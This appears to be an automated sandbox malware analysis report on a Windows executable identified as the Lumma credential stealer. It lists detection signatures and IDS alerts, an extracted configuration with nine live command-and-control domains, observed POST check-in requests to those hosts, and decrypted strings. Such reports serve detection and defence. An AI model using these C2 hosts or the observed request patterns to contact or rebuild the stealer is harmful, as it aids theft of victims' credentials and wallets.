
Windows Analysis Report
SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe

Overview

General Information

Sample name: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe
Analysis ID: 1532746
MD5: de577c633508c2bc5e7be2ad04bf34f3
SHA1: 7a88fa2b07e7ef10de364579235e37d40be949ed
SHA256: 84f11a69fc5ab994993203b7e262203b9a86e943a233a932f7230c98b86740f1
Tags: exe

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • cleanup
Malware family
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Extracted malware configuration: {"C2 url": ["caffegclasiqwp.shop", "traineiwnqo.shop", "stamppreewntnq.shop", "stagedchheiqwo.shop", "condedqpwqm.shop", "millyscroqwp.shop", "nippydxmnwquo.shop", "evoliutwoqm.shop", "locatedblsoqp.shop"], "Build id": "XWVnVB--land1"}
Yara matches
Source | Rule | Description | Author | Strings
00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp | Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth | 0x0:$x1: 4d5a9000030000000
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
2.2.BitLockerToGo.exe.400000.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
2.2.BitLockerToGo.exe.400000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |

No Sigma rule has matched
Suricata IDS alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-13T21:34:53.689769+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49707 | 188.114.96.3 | 443 | TCP
2024-10-13T21:34:56.217981+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49709 | 104.21.53.8 | 443 | TCP
2024-10-13T21:34:57.441465+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49712 | 104.21.53.8 | 443 | TCP
2024-10-13T21:34:53.799618+0200 | 2055474 | 1 | A Network Trojan was detected | 192.168.2.7 | 52560 | 1.1.1.1 | 53 | UDP
2024-10-13T21:34:53.740374+0200 | 2055475 | 1 | A Network Trojan was detected | 192.168.2.7 | 63654 | 1.1.1.1 | 53 | UDP
2024-10-13T21:34:53.753153+0200 | 2055477 | 1 | A Network Trojan was detected | 192.168.2.7 | 55731 | 1.1.1.1 | 53 | UDP
2024-10-13T21:34:53.712514+0200 | 2055479 | 1 | A Network Trojan was detected | 192.168.2.7 | 62754 | 1.1.1.1 | 53 | UDP
2024-10-13T21:34:53.764790+0200 | 2055480 | 1 | A Network Trojan was detected | 192.168.2.7 | 49638 | 1.1.1.1 | 53 | UDP
2024-10-13T21:34:53.776070+0200 | 2055481 | 1 | A Network Trojan was detected | 192.168.2.7 | 54698 | 1.1.1.1 | 53 | UDP
2024-10-13T21:34:53.788496+0200 | 2055482 | 1 | A Network Trojan was detected | 192.168.2.7 | 64945 | 1.1.1.1 | 53 | UDP
2024-10-13T21:34:53.724743+0200 | 2055483 | 1 | A Network Trojan was detected | 192.168.2.7 | 62260 | 1.1.1.1 | 53 | UDP
2024-10-13T21:34:53.689769+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.7 | 49707 | 188.114.96.3 | 443 | TCP
2024-10-13T21:34:56.217981+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.7 | 49709 | 104.21.53.8 | 443 | TCP
2024-10-13T21:34:57.441465+0200 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.7 | 49712 | 104.21.53.8 | 443 | TCP
2024-10-13T21:34:55.109408+0200 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49708 | 104.102.49.254 | 443 | TCP

AV Detection

Source: locatedblsoqp.shop | URL Reputation: Label: phishing
Source: caffegclasiqwp.shop | URL Reputation: Label: malware
Source: condedqpwqm.shop | URL Reputation: Label: phishing
Source: millyscroqwp.shop | URL Reputation: Label: malware
Source: stamppreewntnq.shop | URL Reputation: Label: phishing
Source: stagedchheiqwo.shop | URL Reputation: Label: phishing
Source: traineiwnqo.shop | URL Reputation: Label: malware
Source: https://locatedblsoqp.shop/api | URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900 | URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/ | URL Reputation: Label: malware
Source: 2.2.BitLockerToGo.exe.400000.0.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["caffegclasiqwp.shop", "traineiwnqo.shop", "stamppreewntnq.shop", "stagedchheiqwo.shop", "condedqpwqm.shop", "millyscroqwp.shop", "nippydxmnwquo.shop", "evoliutwoqm.shop", "locatedblsoqp.shop"], "Build id": "XWVnVB--land1"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp | String decryptor: caffegclasiqwp.shop
Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp | String decryptor: stamppreewntnq.shop
Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp | String decryptor: stagedchheiqwo.shop
Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp | String decryptor: millyscroqwp.shop
Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp | String decryptor: evoliutwoqm.shop
Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp | String decryptor: condedqpwqm.shop
Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp | String decryptor: traineiwnqo.shop
Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp | String decryptor: locatedblsoqp.shop
Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp | String decryptor: nippydxmnwquo.shop
Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp | String decryptor: XWVnVB--land1
Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49712 version: TLS 1.2
Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: BitLockerToGo.pdb | source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.00000000018AC000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL | source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.00000000018AC000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, dword ptr [esp+1Ch] | 2_2_0040C000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ecx, dword ptr [esp] | 2_2_0040B810
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-14h] | 2_2_0043BC78
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov edx, dword ptr [esp] | 2_2_0040CC80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov edx, dword ptr [esp] | 2_2_0040C69D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, dword ptr [esp+08h] | 2_2_00413846
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, dword ptr [esp+00000874h] | 2_2_0041E850
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov word ptr [edx], cx | 2_2_0041E850
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov word ptr [edx], cx | 2_2_0041F862
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov edi, dword ptr [edx+ebx+3Ch] | 2_2_0043A830
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx eax, word ptr [esi+ecx] | 2_2_004390C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ecx, dword ptr [esp] | 2_2_0043E8D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, dword ptr [ebp-10h] | 2_2_0043E080
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp eax | 2_2_00413888
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov word ptr [edx], cx | 2_2_0041F8B7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 2_2_0041F8B7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ecx, dword ptr [esp] | 2_2_0041D940
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 2_2_00431950
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov byte ptr [ecx], al | 2_2_00415172
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-24h] | 2_2_00415172
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx eax, word ptr [ebx] | 2_2_0043F9E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [ebx+esi*8], 625B6034h | 2_2_004211B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov dword ptr [esp], 00000000h | 2_2_00413A50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ecx, dword ptr [esi+000000D8h] | 2_2_0042A2DC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, dword ptr [esi+34h] | 2_2_0042A2DC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ecx, dword ptr [esi+18h] | 2_2_0042A2DC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh | 2_2_0042A2DC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, dword ptr [esp+04h] | 2_2_004122E6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h | 2_2_0043F290
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_00427B30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_00423BE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov word ptr [ecx], ax | 2_2_0041DBEA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, dword ptr [ebp-10h] | 2_2_0043E390
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 2_2_0043D470
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, dword ptr [ebp-10h] | 2_2_0043DC70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h | 2_2_0041C400
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov edx, dword ptr [ebp-10h] | 2_2_0041E411
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 2_2_004104D1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, dword ptr [esp+38h] | 2_2_0040F578
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp edx | 2_2_0041CDED
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp byte ptr [ebx+01h], 00000000h | 2_2_0041CDED
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 2_2_00424640
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_0041C660
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h | 2_2_00415E62
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ecx, dword ptr [esi+000000D8h] | 2_2_0042866E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edx, byte ptr [esi+edi] | 2_2_00403E70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, dword ptr [esp+00000874h] | 2_2_0041E6C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov word ptr [edx], cx | 2_2_0041E6C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_00423F07
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, dword ptr [ebp-10h] | 2_2_0043DF90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp edx | 2_2_0043A796

Networking

Source: Network traffic | Suricata IDS: 2055480 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (millyscroqwp .shop) : 192.168.2.7:49638 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2055482 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (stamppreewntnq .shop) : 192.168.2.7:64945 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2055477 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (evoliutwoqm .shop) : 192.168.2.7:55731 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2055481 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (stagedchheiqwo .shop) : 192.168.2.7:54698 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2055475 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (condedqpwqm .shop) : 192.168.2.7:63654 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2055474 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (caffegclasiqwp .shop) : 192.168.2.7:52560 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.7:62754 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.7:62260 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:49708 -> 104.102.49.254:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49709 -> 104.21.53.8:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49709 -> 104.21.53.8:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49707 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49707 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49712 -> 104.21.53.8:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49712 -> 104.21.53.8:443
Source: Malware configuration extractor | URLs: caffegclasiqwp.shop
Source: Malware configuration extractor | URLs: traineiwnqo.shop
Source: Malware configuration extractor | URLs: stamppreewntnq.shop
Source: Malware configuration extractor | URLs: stagedchheiqwo.shop
Source: Malware configuration extractor | URLs: condedqpwqm.shop
Source: Malware configuration extractor | URLs: millyscroqwp.shop
Source: Malware configuration extractor | URLs: nippydxmnwquo.shop
Source: Malware configuration extractor | URLs: evoliutwoqm.shop
Source: Malware configuration extractor | URLs: locatedblsoqp.shop
Source: Joe Sandbox View | IP Address: 104.21.53.8
Source: Joe Sandbox View | IP Address: 188.114.96.3
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: AKAMAI-ASUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: nippydxmnwquo.shop
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: sergei-esenin.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Cookie: __cf_mw_byp=_jIYC2pQ1pswVVaeyx4n19P1ZvDbEX.5r1GxGZkKCpE-1728848096-0.0.1.1-/api | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 47 | Host: sergei-esenin.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: BitLockerToGo.exe, 00000002.00000002.1646797955.000000000061D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.000000000061D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https: equals www.youtube.com (Youtube)
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: :bContent-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=b2c26a1103d97c5dd06069b2; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type34837Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSun, 13 Oct 2024 19:34:55 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control,& equals www.youtube.com (Youtube)
            Source: BitLockerToGo.exe, 00000002.00000003.1624530876.000000000061D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
            Source: global traffic | DNS traffic detected: DNS query: nippydxmnwquo.shop
            Source: global traffic | DNS traffic detected: DNS query: locatedblsoqp.shop
            Source: global traffic | DNS traffic detected: DNS query: traineiwnqo.shop
            Source: global traffic | DNS traffic detected: DNS query: condedqpwqm.shop
            Source: global traffic | DNS traffic detected: DNS query: evoliutwoqm.shop
            Source: global traffic | DNS traffic detected: DNS query: millyscroqwp.shop
            Source: global traffic | DNS traffic detected: DNS query: stagedchheiqwo.shop
            Source: global traffic | DNS traffic detected: DNS query: stamppreewntnq.shop
            Source: global traffic | DNS traffic detected: DNS query: caffegclasiqwp.shop
            Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
            Source: global traffic | DNS traffic detected: DNS query: sergei-esenin.com
            Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: nippydxmnwquo.shop
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
